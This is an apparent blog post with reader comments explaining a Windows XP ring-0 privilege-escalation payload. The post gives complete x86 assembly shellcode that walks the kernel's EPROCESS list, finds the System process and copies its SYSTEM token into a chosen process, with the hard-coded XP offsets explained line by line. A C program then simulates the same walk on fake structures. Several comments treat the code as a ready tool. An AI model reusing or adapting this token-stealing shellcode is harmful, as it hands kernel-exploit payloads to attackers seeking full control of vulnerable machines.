Windows XP Ring 0 Kernel Mode Hacking

So you’ve found a vulnerability in Windows XP that drops you into kernel mode, and there you are thinking hehehehe (this is an evil laugh), I can do whatever I want. The only issue is that you call win32 function after win32 function only to realise that in ring 0 kernel mode you can’t do a damn thing: the Win32 API lives in user-mode DLLs and is built to be called from ring 3, not from the kernel. After the tenth reset of your PC you realise that the code you actually want to run is ring 3 code. So you play around and find out that you can modify memory and change a few strings. Ohhhh, the power! You can change some strings. This is pointless.

You read up on kernel mode and find out that SYSENTER (Intel) and SYSCALL (AMD) are the instructions a user-mode thread uses to get into the kernel’s system service dispatcher, which is where NtCreateFile and friends live and where basic disk access would come from. They are no help when you are already in ring 0, and if you use the wrong instruction on the wrong processor it faults. It’s a start, but it’s a heck of a lot of code to check the processor type and then actually get the native API to do anything useful. You can’t just open files in the normal way, and you can bet that if we try to allocate some heap memory it will… crash… again. And then you think, yep, of course it will: heap allocation is carried out by win32 API functions which run in ring 3 user mode. Fuck it!

So here’s the answer. It took me ages to find this and get it to compile. At fs:[0x124] in Windows XP there just so happens to be a pointer to the current thread’s KTHREAD (KPCR.PrcbData.CurrentThread), and at offset 0x44 in that is the EPROCESS of the process the thread belongs to. Every EPROCESS is linked to the next one through a LIST_ENTRY at offset 0x88 (ActiveProcessLinks), so from any one of them you can walk all the processes on the box. At offset 0x84 is the process ID and at offset 0xC8 is the pointer to the process’s access token, which is what says which user the process runs as. By default there are normally at least two users: SYSTEM and the current logged-on user. SYSTEM has full access to everything. I like the sound of that. Now process ID 4 in Windows XP is always the System process, running as SYSTEM (it was PID 8 on Windows 2000, and all of these offsets are XP specific and move between Windows versions). As long as we know the process ID of a process we would like to run as SYSTEM, we can just copy the token pointer from PID 4 into our preferred process. Here it goes; my compiler wouldn’t accept all the comments, and I’ve had to put them back:

pushad

; fs:[0x124] is KPCR.PrcbData.CurrentThread, the current KTHREAD;
; KTHREAD+0x44 is ApcState.Process, the EPROCESS we are running in
mov eax,dword ptr fs:[0x124]
mov eax,[eax+0x44]
push eax

s1:
; EPROCESS+0x88 is ActiveProcessLinks.Flink: follow it, then back up
; to the start of the next EPROCESS
mov eax,[eax+0x88]
sub eax,0x88
; EPROCESS+0x84 is UniqueProcessId; process ID 4 (System) has the SYSTEM token
cmp dword ptr [eax+0x84],4
; if this process isn’t ID 4 check the next one
jne s1

; rip out the SYSTEM token: EPROCESS+0xC8 is an EX_FAST_REF, so mask off
; the reference count kept in the low 3 bits
mov edi,[eax+0xC8]
and edi,0xfffffff8

; this assumes we are running a C program with an integer called elevpid
mov ebx, _elevpid

s2:
; keep moving down the process list
mov eax,[eax+0x88]
sub eax,0x88
; this is the process ID we want to be SYSTEM
cmp [eax+0x84],ebx
jne s2

; write the SYSTEM token pointer into our chosen process
mov [eax+0xC8],edi

pop eax

popad

Oh yeah, and don’t enter the wrong process ID into this. The process list is circular, so if the ID isn’t there the loop never finds it and just keeps going round and round the same EPROCESS blocks forever, and ring 0 is really not a place you want to get stuck in an infinite loop. Two other things to keep in mind: the offsets are for XP only, and the token pointer is copied without taking a reference on it, so the elevated process now holds the System token with no refcount of its own and its original token is simply leaked.
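To make the walk above concrete, here is a host-side model of the same logic in C. This is an added example, not the original post’s code and not kernel code: it builds fake EPROCESS blocks with the same XP offsets the shellcode hard-codes (UniqueProcessId at 0x84, ActiveProcessLinks at 0x88, Token at 0xC8, block size taken as 0x260), links them into a circular list with a list head standing in for PsActiveProcessHead, and then does exactly what the assembly does, except that the walk stops when it gets back to where it started, so a process ID that isn’t in the list returns an error instead of spinning forever. The PIDs and token pointer values are constructed sample data.

```c
/* Host-side model of the XP token-stealing walk (added example, not
 * the original post's code and not kernel code). Fake EPROCESS blocks
 * use the Windows XP offsets the shellcode hard-codes; the list is a
 * ring with a head block standing in for PsActiveProcessHead. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OFF_PID       0x84      /* EPROCESS.UniqueProcessId (XP)      */
#define OFF_LINKS     0x88      /* EPROCESS.ActiveProcessLinks        */
#define OFF_TOKEN     0xC8      /* EPROCESS.Token, an EX_FAST_REF     */
#define EPROCESS_SIZE 0x260     /* assumed size of an XP EPROCESS     */
#define SYSTEM_PID    4         /* the System process on XP           */
#define FAST_REF_MASK ((uintptr_t)~7)  /* "and edi, 0xfffffff8"       */
#define NPROC         4

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

typedef union { uint64_t align; uint8_t b[EPROCESS_SIZE]; } ep_block;
typedef struct { ep_block head; ep_block proc[NPROC]; } fake_kernel;

/* Raw-offset accessors: the C spelling of [eax+0x84], [eax+0x88], [eax+0xC8]. */
static uint32_t   *pid_of(uint8_t *ep)   { return (uint32_t *)(ep + OFF_PID); }
static LIST_ENTRY *links_of(uint8_t *ep) { return (LIST_ENTRY *)(ep + OFF_LINKS); }
static uintptr_t  *token_of(uint8_t *ep) { return (uintptr_t *)(ep + OFF_TOKEN); }

/* CONTAINING_RECORD: the "sub eax, 0x88" after loading Flink. */
static uint8_t *eprocess_from_links(LIST_ENTRY *le) { return (uint8_t *)le - OFF_LINKS; }

uint8_t *proc_at(fake_kernel *k, int i) { return k->proc[i].b; }

/* Constructed sample data: PIDs and token pointers whose low 3 bits hold
 * the EX_FAST_REF reference count, as on a real 32-bit XP kernel. */
static const uint32_t  sample_pids[NPROC]   = { SYSTEM_PID, 376, 1184, 2000 };
static const uintptr_t sample_tokens[NPROC] = { 0xE1A4B008u | 3, 0xE1B2C010u | 1,
                                                0xE1C3D018u | 2, 0xE1D4E020u | 1 };

/* Link head -> proc[0] -> ... -> proc[NPROC-1] -> head, like the real list. */
void build_kernel(fake_kernel *k) {
    memset(k, 0, sizeof *k);
    *pid_of(k->head.b) = 0xFFFFFFFFu;   /* real kernel: whatever sits around PsActiveProcessHead */
    LIST_ENTRY *prev = links_of(k->head.b);
    for (int i = 0; i < NPROC; i++) {
        uint8_t *ep = proc_at(k, i);
        *pid_of(ep)   = sample_pids[i];
        *token_of(ep) = sample_tokens[i];
        LIST_ENTRY *cur = links_of(ep);
        prev->Flink = cur;
        cur->Blink  = prev;
        prev = cur;
    }
    prev->Flink = links_of(k->head.b);
    links_of(k->head.b)->Blink = prev;
}

/* Walk forward from 'start' until UniqueProcessId == pid. The list is a
 * ring, so give up (NULL) once we are back at 'start' instead of looping
 * forever like the unbounded "jne s1 / jne s2" would. */
static uint8_t *find_process(uint8_t *start, uint32_t pid) {
    uint8_t *ep = start;
    do {
        ep = eprocess_from_links(links_of(ep)->Flink);
        if (*pid_of(ep) == pid) return ep;
    } while (ep != start);
    return NULL;
}

/* The shellcode's logic. 'self' plays the EPROCESS reached via
 * fs:[0x124] -> +0x44. Returns 0 on success, -1 if there is no PID 4,
 * -2 if target_pid is not in the list (the case the post warns about). */
int steal_token(uint8_t *self, uint32_t target_pid) {
    uint8_t *sys = find_process(self, SYSTEM_PID);
    if (!sys) return -1;
    uintptr_t tok = *token_of(sys) & FAST_REF_MASK;   /* strip the refcount bits */
    uint8_t *target = find_process(self, target_pid);
    if (!target) return -2;
    *token_of(target) = tok;   /* plain pointer copy, no reference taken, same as the asm */
    return 0;
}

/* Token currently held by the process with 'pid', or 0 if it is absent. */
uintptr_t token_for_pid(fake_kernel *k, uint32_t pid) {
    uint8_t *ep = find_process(proc_at(k, 0), pid);
    return ep ? *token_of(ep) : 0;
}

int main(void) {
    fake_kernel k;
    build_kernel(&k);
    int rc = steal_token(proc_at(&k, 2), 2000);
    printf("steal_token(2000) = %d, PID 2000 token now %#lx\n", rc,
           (unsigned long)token_for_pid(&k, 2000));
    printf("steal_token(9999) = %d (not in list, walk stopped)\n",
           steal_token(proc_at(&k, 2), 9999));
    return 0;
}
```

The interesting line is the `while (ep != start)` in find_process: the real kernel list is the same ring, including a list head that is not an EPROCESS, so a bounded walk is the only thing standing between a typo in the PID and a hung box.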

7 Responses to “Windows XP Ring 0 Kernel Mode Hacking”

  1. mgl Says:

    Sick!

    I’ve done something similar, but for an unix based os. Just saved your code on my ring0 goodies folder. :D
    I’ve already got a couple of uses for that code, eheh.

    keep up the good work

  2. Fotobuch Says:

    Hmm, nice code. I will edit it and make something different. Wait, I will show you something. Ha ha ha.

  3. Abhishek Says:

    Your assembly code is cracking my head a little; I have to read my book (which I never opened). I haven’t ever tried kernel hacking. I think I have to learn a lot from you!!

  4. Delivery Codes Says:

    This is looking very easy? Does it really work?

  5. Jobs in South Yorkshire Says:

    Thanks for the code. This is simply great.

  6. online coupons Says:

    Is it possible? I don’t think so.

  7. baby Says:

    Nice website!!